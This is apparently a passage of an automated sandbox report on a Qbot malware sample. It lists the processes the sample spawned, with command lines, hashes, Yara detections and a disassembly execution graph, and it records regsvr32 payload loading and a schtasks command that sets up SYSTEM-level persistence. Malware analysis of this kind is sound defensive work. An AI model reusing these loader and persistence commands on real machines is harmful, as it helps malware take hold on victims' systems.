                                                                                                                                                                                            Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
                                                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.673012355.0000000004280000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001C.00000002.672779315.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                            Start time:19:51:29
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
                                                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 0000001D.00000002.677339037.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                            Start time:19:51:42
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                            Start time:19:51:56
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
                                                                                                                                                                                            Imagebase:0x3c0000
                                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                            Start time:19:51:59
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            Imagebase:0x850000
                                                                                                                                                                                            File size:3611360 bytes
                                                                                                                                                                                            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                            Start time:19:51:59
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            Imagebase:0x850000
                                                                                                                                                                                            File size:3611360 bytes
                                                                                                                                                                                            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                            Start time:19:52:01
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            Imagebase:0x850000
                                                                                                                                                                                            File size:3611360 bytes
                                                                                                                                                                                            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000002.679063028.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000022.00000000.675088728.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                            Start time:19:52:04
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
                                                                                                                                                                                            Imagebase:0xec0000
                                                                                                                                                                                            File size:185856 bytes
                                                                                                                                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                            Start time:19:52:05
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff77f440000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                            Start time:19:52:07
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
                                                                                                                                                                                            Imagebase:0x7ff6a0db0000
                                                                                                                                                                                            File size:24064 bytes
                                                                                                                                                                                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                            Start time:19:52:10
                                                                                                                                                                                            Start date:07/06/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline: -s "C:\Users\user\AppData\Local\Temp\t1.A"
                                                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:Borland Delphi

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Reset < >

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:6.2%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                              Signature Coverage:3.5%
                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                              Total number of Limit Nodes:53
                                                                                                                                                                                              execution_graph 13785 499201c 13786 499204f 13785->13786 13787 4992047 13785->13787 13788 4999930 2 API calls 13786->13788 13789 499205f 13788->13789 13790 4992094 13789->13790 13817 4999aaf 13789->13817 13792 49996f3 2 API calls 13790->13792 13794 49920b2 13792->13794 13795 499c307 2 API calls 13794->13795 13797 49920c4 13795->13797 13796 4999930 2 API calls 13796->13790 13798 49920cb 13797->13798 13799 499c0aa 5 API calls 13797->13799 13800 4998bf4 2 API calls 13798->13800 13816 49920db 13799->13816 13801 4992242 13800->13801 13802 4998bf4 2 API calls 13801->13802 13803 499224d 13802->13803 13804 4998bf4 2 API calls 13803->13804 13811 4992259 13804->13811 13805 4992281 13807 4999c2c 2 API calls 13805->13807 13806 4992276 13810 4998bf4 2 API calls 13806->13810 13807->13787 13808 4998bf4 2 API calls 13808->13811 13809 4998baf HeapFree memset 13809->13816 13810->13805 13811->13805 13811->13806 13811->13808 13812 4999df2 lstrlenA RtlAllocateHeap 13812->13816 13813 4999a5a RtlAllocateHeap lstrcatW 13813->13816 13814 499b5fb memset GetExitCodeProcess 13814->13816 13815 4998bf4 HeapFree memset 13815->13816 13816->13798 13816->13809 13816->13812 13816->13813 13816->13814 13816->13815 13818 4999ac6 13817->13818 13824 4998bde RtlAllocateHeap 13818->13824 13820 499207d 13820->13787 13820->13796 13821 4999b07 lstrcatA 13822 4999b1b lstrcatA 13821->13822 13823 4999afc 13821->13823 13822->13823 13823->13820 13823->13821 13824->13823 13045 4992297 13046 49996f3 2 API calls 13045->13046 13047 49922ce 13046->13047 13048 499c307 2 API calls 13047->13048 13049 49922e6 13048->13049 13050 49922ed 13049->13050 13067 499c0aa memset 13049->13067 13052 4998bf4 2 API calls 13050->13052 13060 4992434 13052->13060 13053 499245b 13055 4999c2c 2 API calls 13053->13055 13054 4992450 13057 4998bf4 2 API calls 13054->13057 13059 4992468 13055->13059 13056 4998bf4 2 API calls 13056->13060 13057->13053 13058 4999df2 2 API calls 13061 49922fd 13058->13061 13060->13053 13060->13054 13060->13056 13061->13050 13061->13058 13062 4998bf4 HeapFree memset 13061->13062 13063 499109a 2 API calls 13061->13063 13064 4999a5a RtlAllocateHeap lstrcatW 13061->13064 13065 4998baf HeapFree memset 13061->13065 13066 499b5fb memset GetExitCodeProcess 13061->13066 13062->13061 13063->13061 13064->13061 13065->13061 13066->13061 13082 4998bde RtlAllocateHeap 13067->13082 13069 499c0d1 13070 49998bd RtlAllocateHeap 13069->13070 13081 499c155 13069->13081 13071 499c0ef 13070->13071 13072 49998bd RtlAllocateHeap 13071->13072 13073 499c102 13072->13073 13074 49998bd RtlAllocateHeap 13073->13074 13075 499c116 13074->13075 13076 4999df2 2 API calls 13075->13076 13077 499c123 13076->13077 13078 4998baf 2 API calls 13077->13078 13079 499c149 13078->13079 13080 49998bd RtlAllocateHeap 13079->13080 13080->13081 13081->13061 13082->13069 13139 499598e 13144 499e4e0 13139->13144 13142 49959ac 13143 49959a3 GetLastError 13143->13142 13169 4998bde RtlAllocateHeap 13144->13169 13146 499e4f7 13147 499599f 13146->13147 13148 49998bd RtlAllocateHeap 13146->13148 13147->13142 13147->13143 13149 499e50c 13148->13149 13149->13147 13170 499a46b 13149->13170 13152 4999df2 2 API calls 13153 499e52c 13152->13153 13154 4999e51 2 API calls 13153->13154 13155 499e541 13154->13155 13156 4998baf 2 API calls 13155->13156 13157 499e54a 13156->13157 13178 499e330 13157->13178 13159 499e554 13160 499e55b 13159->13160 13185 499e374 13159->13185 13162 4998bf4 2 API calls 13160->13162 13163 499e62e 13162->13163 13164 4998bf4 2 API calls 13163->13164 13165 499e639 13164->13165 13166 4998bf4 2 API calls 13165->13166 13166->13147 13167 499e56a 13167->13160 13168 499e601 lstrlenW 13167->13168 13168->13167 13169->13146 13171 499a484 13170->13171 13172 4998c72 3 API calls 13171->13172 13173 499a584 13171->13173 13177 499a4ff 13171->13177 13172->13177 13173->13152 13174 499a55c 13174->13173 13175 4998d6d memset 13174->13175 13175->13173 13177->13174 13198 4998ce0 13177->13198 13179 4999df2 2 API calls 13178->13179 13180 499e342 13179->13180 13202 4999d18 13180->13202 13183 4998baf 2 API calls 13184 499e357 13183->13184 13184->13159 13186 4999a5a 2 API calls 13185->13186 13187 499e38d CoInitializeEx 13186->13187 13188 4999df2 2 API calls 13187->13188 13189 499e3a8 13188->13189 13190 4999df2 2 API calls 13189->13190 13191 499e3b9 13190->13191 13192 4998baf 2 API calls 13191->13192 13193 499e3d5 13192->13193 13194 4998baf 2 API calls 13193->13194 13195 499e3eb 13194->13195 13196 4998bf4 2 API calls 13195->13196 13197 499e3f6 13196->13197 13197->13167 13199 4998d01 13198->13199 13199->13199 13200 4998d21 lstrlenA 13199->13200 13201 4998d35 13200->13201 13201->13177 13201->13201 13203 49996f3 2 API calls 13202->13203 13204 4999d39 13203->13204 13205 4999a5a 2 API calls 13204->13205 13206 4999d5a 13205->13206 13206->13183 13846 4991301 13847 499a91d 4 API calls 13846->13847 13848 4991318 13847->13848 13849 499133d 13848->13849 13850 49a3674 2 API calls 13848->13850 13884 49911e9 13849->13884 13850->13849 13853 4991372 13856 4991440 13858 499b179 4 API calls 13856->13858 13860 4991457 13858->13860 13861 499b266 5 API calls 13860->13861 13863 4991463 13861->13863 13862 49913dd 14056 499b179 13862->14056 14083 49979c0 13863->14083 13865 499a9f0 4 API calls 13869 49913d4 13865->13869 13869->13862 13909 499687d 13869->13909 13870 4998bf4 2 API calls 13870->13853 13871 4991498 14108 499111d 13871->14108 13872 49914aa 13876 49913a9 13872->13876 13880 499111d 8 API calls 13872->13880 13876->13870 13878 49914a4 14118 49910ec 13878->14118 13880->13878 13885 4999dd8 2 API calls 13884->13885 13886 49911fa 13885->13886 13887 4999a07 2 API calls 13886->13887 13888 4991216 13887->13888 13889 4998b9c 2 API calls 13888->13889 13890 4991223 13889->13890 13890->13853 13891 499a9f0 13890->13891 13892 499aa00 4 API calls 13891->13892 13893 4991382 13892->13893 13893->13856 13894 4997b4d 13893->13894 14126 4997d9b 13894->14126 13896 4997b6a 13907 49913a0 13896->13907 14137 4997611 13896->14137 13898 4998bf4 2 API calls 13899 4997bd6 13898->13899 13901 4998bf4 2 API calls 13899->13901 13900 4997b94 13908 4997b9b 13900->13908 14154 49975ab 13900->14154 13903 4997be1 13901->13903 13905 4998bf4 2 API calls 13903->13905 13905->13907 13907->13862 13907->13865 13907->13876 13908->13898 14412 4998bde RtlAllocateHeap 13909->14412 13911 4996893 13912 499a96c 4 API calls 13911->13912 14008 4996d6c 13911->14008 13913 49968a8 13912->13913 14413 499fbdb 13913->14413 13918 49998bd RtlAllocateHeap 13919 49968cc 13918->13919 13920 49998bd RtlAllocateHeap 13919->13920 13921 49968e0 13920->13921 13922 4996905 13921->13922 13923 49998bd RtlAllocateHeap 13921->13923 13924 49998bd RtlAllocateHeap 13922->13924 13923->13922 13925 499692a 13924->13925 14439 499e7c6 13925->14439 13931 4996996 13932 499109a 2 API calls 13931->13932 13933 49969c3 13932->13933 13934 499109a 2 API calls 13933->13934 13935 49969d2 13934->13935 13936 499109a 2 API calls 13935->13936 13937 49969e1 13936->13937 13938 499109a 2 API calls 13937->13938 13939 49969ee 13938->13939 13940 499109a 2 API calls 13939->13940 13941 49969ff 13940->13941 13942 499109a 2 API calls 13941->13942 13943 4996a10 13942->13943 13944 4999e51 2 API calls 13943->13944 13945 4996a32 13944->13945 13946 499109a 2 API calls 13945->13946 13947 4996a3c 13946->13947 13948 499109a 2 API calls 13947->13948 13949 4996a4c 13948->13949 13950 499109a 2 API calls 13949->13950 13951 4996a5b 13950->13951 13952 499109a 2 API calls 13951->13952 13953 4996a6a 13952->13953 13954 499109a 2 API calls 13953->13954 13955 4996a79 13954->13955 13956 499109a 2 API calls 13955->13956 13957 4996a88 13956->13957 14493 499b6ae 13957->14493 13960 499b6ae 5 API calls 13961 4996aa5 13960->13961 13962 499b6ae 5 API calls 13961->13962 13963 4996ab5 13962->13963 13964 499b6ae 5 API calls 13963->13964 13965 4996ac5 13964->13965 13966 499b6ae 5 API calls 13965->13966 13967 4996ad2 13966->13967 13968 4996af1 13967->13968 13969 499b6ae 5 API calls 13967->13969 13970 499b6ae 5 API calls 13968->13970 13969->13968 13971 4996aff 13970->13971 13972 499b6ae 5 API calls 13971->13972 13973 4996b0d 13972->13973 13974 499b6ae 5 API calls 13973->13974 13975 4996b1b 13974->13975 13976 499b6ae 5 API calls 13975->13976 13977 4996b29 13976->13977 13978 499b6ae 5 API calls 13977->13978 13979 4996b37 13978->13979 13980 499b6ae 5 API calls 13979->13980 14008->13862 14057 4999df2 2 API calls 14056->14057 14058 499b188 14057->14058 14059 4998baf 2 API calls 14058->14059 14060 49913f9 14059->14060 14061 499b266 14060->14061 14062 499a91d 4 API calls 14061->14062 14063 499b278 14062->14063 14064 499a065 GetSystemTimeAsFileTime 14063->14064 14065 4991405 14064->14065 14066 4997bf5 14065->14066 14602 49a03bd 14066->14602 14068 4997c15 14605 499802c 14068->14605 14770 499970f 14083->14770 14086 49a03bd GetTickCount 14087 4997a07 14086->14087 14776 4997df8 14087->14776 14089 499148c 14089->13871 14089->13872 14090 4997a27 14090->14089 14091 4997611 19 API calls 14090->14091 14092 4997a57 14091->14092 14095 49975ab 8 API calls 14092->14095 14107 4997a5e 14092->14107 14093 4998bf4 2 API calls 14094 4997b2d 14093->14094 14096 4998bf4 2 API calls 14094->14096 14097 4997a88 14095->14097 14098 4997b38 14096->14098 14097->14107 14815 4997858 14097->14815 14099 4998bf4 2 API calls 14098->14099 14099->14089 14101 4997ab6 14101->14107 14828 4997728 14101->14828 14105 4997b02 14850 49976d7 14105->14850 14107->14093 14109 4991133 14108->14109 14110 4999edb memset 14109->14110 14117 4991187 14109->14117 14111 4991159 14110->14111 14112 499a065 GetSystemTimeAsFileTime 14111->14112 14113 499116e 14112->14113 14114 499aa91 6 API calls 14113->14114 14115 499117c 14114->14115 14116 499aa65 6 API calls 14115->14116 14116->14117 14117->13878 14119 49910f2 14118->14119 14120 4991104 14118->14120 14122 499a96c 4 API calls 14119->14122 14121 499a96c 4 API calls 14120->14121 14123 49910f9 14121->14123 14122->14123 14894 49910c5 14123->14894 14125 499111b 14125->13876 14166 49a1152 14126->14166 14128 4997da4 14170 4998753 14128->14170 14130 4997db7 14131 4998753 strncpy 14130->14131 14132 4997dcb 14131->14132 14133 4998753 strncpy 14132->14133 14134 4997ddf 14133->14134 14174 49a1bd3 14134->14174 14136 4997de7 14136->13896 14262 49974fa 14137->14262 14140 49976b8 14140->13900 14142 499764b 14143 4997680 14142->14143 14276 4997417 14142->14276 14144 4998bf4 2 API calls 14143->14144 14146 4997698 14144->14146 14147 4998bf4 2 API calls 14146->14147 14148 49976a3 14147->14148 14150 4998bf4 2 API calls 14148->14150 14149 4997659 14149->14143 14284 499fab4 14149->14284 14152 49976ae 14150->14152 14152->14140 14153 4998bf4 2 API calls 14152->14153 14153->14140 14155 499c307 2 API calls 14154->14155 14156 49975c3 14155->14156 14157 4997473 5 API calls 14156->14157 14162 49975ff 14156->14162 14158 49975e2 14157->14158 14159 49a0320 lstrlenW 14158->14159 14160 49975f6 14159->14160 14161 4998ce0 lstrlenA 14160->14161 14161->14162 14163 49977de 14162->14163 14353 49a1cc0 14163->14353 14165 49977f7 14165->13908 14167 49a115a 14166->14167 14169 49a1161 14167->14169 14179 49a288e 14167->14179 14169->14128 14171 4998769 14170->14171 14172 4998764 14170->14172 14197 49a1232 14171->14197 14172->14130 14175 49a1be2 14174->14175 14176 49a1be7 14175->14176 14209 49a1b77 14175->14209 14176->14136 14178 49a1c00 14178->14136 14180 49a289d 14179->14180 14181 49a28d0 14179->14181 14182 49a28c1 SwitchToThread 14180->14182 14184 49a28ae 14180->14184 14181->14169 14182->14181 14182->14182 14183 49a28b7 14183->14169 14184->14183 14186 49a2868 14184->14186 14191 49a28f0 GetModuleHandleW 14186->14191 14188 49a2875 14189 49a2883 14188->14189 14196 49a28d2 _time64 GetCurrentProcessId 14188->14196 14189->14183 14192 49a290e GetProcAddress 14191->14192 14195 49a293f 14191->14195 14193 49a2922 GetProcAddress 14192->14193 14192->14195 14194 49a2931 GetProcAddress 14193->14194 14193->14195 14194->14195 14195->14188 14196->14189 14198 49a123d 14197->14198 14199 49a1264 14197->14199 14198->14199 14201 49a1278 14198->14201 14199->14172 14202 49a12a6 14201->14202 14203 49a1283 14201->14203 14202->14199 14203->14202 14205 49a2e7a 14203->14205 14206 49a2e92 14205->14206 14207 49a2ee5 14206->14207 14208 49a2f19 strncpy 14206->14208 14207->14202 14208->14207 14210 49a1b8a 14209->14210 14212 49a1ba6 14210->14212 14213 49a1464 14210->14213 14212->14178 14214 49a1492 14213->14214 14224 49a14a4 14213->14224 14215 49a14ce 14214->14215 14216 49a14fe 14214->14216 14217 49a154f 14214->14217 14218 49a1662 14214->14218 14223 49a152e 14214->14223 14214->14224 14221 49a14d4 _snprintf 14215->14221 14237 49a3379 14216->14237 14254 49a1c2d _snprintf 14217->14254 14220 49a1c2d 2 API calls 14218->14220 14225 49a1691 14220->14225 14221->14224 14249 49a19a9 14223->14249 14224->14212 14225->14224 14229 49a1713 14225->14229 14234 49a1849 14225->14234 14227 49a155e 14227->14224 14228 49a1464 11 API calls 14227->14228 14228->14227 14229->14224 14231 49a1754 qsort 14229->14231 14230 49a19a9 2 API calls 14230->14234 14231->14224 14236 49a177d 14231->14236 14232 49a1464 11 API calls 14232->14234 14233 49a19a9 2 API calls 14233->14236 14234->14224 14234->14230 14234->14232 14235 49a1464 11 API calls 14235->14236 14236->14224 14236->14233 14236->14235 14238 49a3383 14237->14238 14239 49a3386 _snprintf 14237->14239 14238->14239 14240 49a33af 14239->14240 14248 49a3426 14239->14248 14240->14248 14259 49a3352 localeconv 14240->14259 14243 49a33c9 strchr 14244 49a33ed strchr 14243->14244 14245 49a33d7 14243->14245 14246 49a3400 14244->14246 14244->14248 14245->14244 14245->14248 14247 4998ce0 lstrlenA 14246->14247 14246->14248 14247->14248 14248->14224 14251 49a19bf 14249->14251 14250 49a1b47 14250->14224 14251->14250 14252 49a1ad9 _snprintf 14251->14252 14253 49a1ac2 _snprintf 14251->14253 14252->14251 14253->14251 14256 49a1c4e 14254->14256 14255 49a1c55 14255->14227 14256->14255 14257 49a2e7a strncpy 14256->14257 14258 49a1c6b 14257->14258 14258->14227 14260 49a3362 strchr 14259->14260 14261 49a3374 strchr 14259->14261 14260->14261 14261->14243 14261->14244 14288 4998bde RtlAllocateHeap 14262->14288 14264 4997514 14265 49a351a 2 API calls 14264->14265 14272 4997595 14264->14272 14266 4997538 14265->14266 14289 4997473 14266->14289 14268 499754d 14269 49a0320 lstrlenW 14268->14269 14270 4997580 14269->14270 14271 4998d6d memset 14270->14271 14271->14272 14272->14140 14273 499c295 14272->14273 14298 4998bde RtlAllocateHeap 14273->14298 14275 499c2ba 14275->14142 14277 4997428 14276->14277 14278 49996da 2 API calls 14277->14278 14279 4997444 14278->14279 14299 4998bde RtlAllocateHeap 14279->14299 14281 499744f 14282 4997469 14281->14282 14283 4999e12 2 API calls 14281->14283 14282->14149 14283->14282 14287 499fac8 14284->14287 14286 499fb0e 14286->14143 14287->14286 14300 499fb15 14287->14300 14288->14264 14290 499748c 14289->14290 14291 4991080 2 API calls 14290->14291 14292 4997499 lstrcpynA 14291->14292 14293 49974b7 14292->14293 14294 4998b9c 2 API calls 14293->14294 14295 49974c1 14294->14295 14296 4998d6d memset 14295->14296 14297 49974e6 14296->14297 14297->14268 14298->14275 14299->14281 14305 499f7a6 memset memset 14300->14305 14302 499fb41 14303 499fb64 14302->14303 14331 499f5a4 14302->14331 14303->14287 14306 4999dd8 2 API calls 14305->14306 14307 499f7fa 14306->14307 14308 4999dd8 2 API calls 14307->14308 14309 499f807 14308->14309 14310 4999dd8 2 API calls 14309->14310 14311 499f814 14310->14311 14312 4999dd8 2 API calls 14311->14312 14313 499f821 14312->14313 14314 4999dd8 2 API calls 14313->14314 14315 499f82e 14314->14315 14316 4998d6d memset 14315->14316 14328 499f842 14316->14328 14317 499f8bf GetLastError 14317->14328 14318 499fa12 14319 4998d6d memset 14318->14319 14323 499f88c 14318->14323 14320 499fa34 14319->14320 14322 499fa50 GetLastError 14320->14322 14320->14323 14321 499f900 GetLastError 14321->14328 14322->14323 14323->14302 14324 499f958 GetLastError 14324->14328 14326 4999dd8 2 API calls 14326->14328 14327 4998b9c 2 API calls 14327->14328 14328->14317 14328->14318 14328->14321 14328->14323 14328->14324 14328->14326 14328->14327 14329 499a065 GetSystemTimeAsFileTime 14328->14329 14330 499f9d2 GetLastError 14328->14330 14347 499f6ec 14328->14347 14329->14328 14330->14328 14332 499f5c1 14331->14332 14351 4998bde RtlAllocateHeap 14332->14351 14334 499f5d6 14335 499f5df 14334->14335 14352 4998bde RtlAllocateHeap 14334->14352 14337 499f6b2 14335->14337 14338 4998bf4 2 API calls 14335->14338 14339 499f6ca 14337->14339 14340 4998bf4 2 API calls 14337->14340 14338->14337 14339->14303 14340->14339 14341 499f68c GetLastError 14341->14335 14342 499f698 14341->14342 14344 499a065 GetSystemTimeAsFileTime 14342->14344 14343 499a065 GetSystemTimeAsFileTime 14345 499f5ef 14343->14345 14344->14335 14345->14335 14345->14337 14345->14341 14345->14343 14346 4998c72 3 API calls 14345->14346 14346->14345 14348 499f70e 14347->14348 14349 499f733 GetLastError 14348->14349 14350 499f72e 14348->14350 14349->14350 14350->14328 14351->14334 14352->14345 14354 49a1d13 14353->14354 14355 49a1ccd 14353->14355 14354->14165 14355->14354 14358 49a240b 14355->14358 14357 49a1d00 14357->14165 14365 49a1e0e 14358->14365 14360 49a2422 14364 49a2449 14360->14364 14369 49a257f 14360->14369 14362 49a2440 14363 49a1e0e 8 API calls 14362->14363 14362->14364 14363->14364 14364->14357 14366 49a1e20 14365->14366 14368 49a1e59 14366->14368 14379 49a1fad 14366->14379 14368->14360 14370 49a2596 14369->14370 14377 49a25e0 14369->14377 14371 49a25b2 14370->14371 14372 49a2606 14370->14372 14370->14377 14373 49a25b7 14371->14373 14374 49a25f5 14371->14374 14405 49a238b 14372->14405 14373->14377 14378 49a25c8 memchr 14373->14378 14395 49a247c 14374->14395 14377->14362 14378->14377 14380 49a1fc7 14379->14380 14381 49a1fec 14380->14381 14382 49a2081 14380->14382 14383 49a2036 14380->14383 14381->14368 14382->14381 14386 49a3439 